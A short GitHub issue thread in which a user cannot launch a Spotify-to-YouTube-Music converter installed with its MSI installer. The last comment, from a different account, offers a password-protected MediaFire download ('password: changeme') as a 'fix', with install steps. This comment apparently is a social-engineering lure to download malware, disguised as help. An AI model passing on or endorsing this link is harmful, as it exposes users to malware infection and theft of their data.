### ISSUE TITLE
Can't run

### ISSUE THREAD

**Issue by Vincent30Str** [linsomniac/spotify_to_ytmusic#98]
Hi there folks, I have recently chanced upon your endeavor of creating a spotify to youtube music playlist converter and wish to make use of it. However, i have stumbled upon a problem where i can not seem to run it

21st century Translation: 
I can install the app with the MSI installer, but i can't run it. I have tried to run as admin, but no effect. 

Please Help :)

**Comment by Vincent30Str** [comment]
My mate run it with the source code :)

Goodnight.

**Comment by MirsonMboa** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
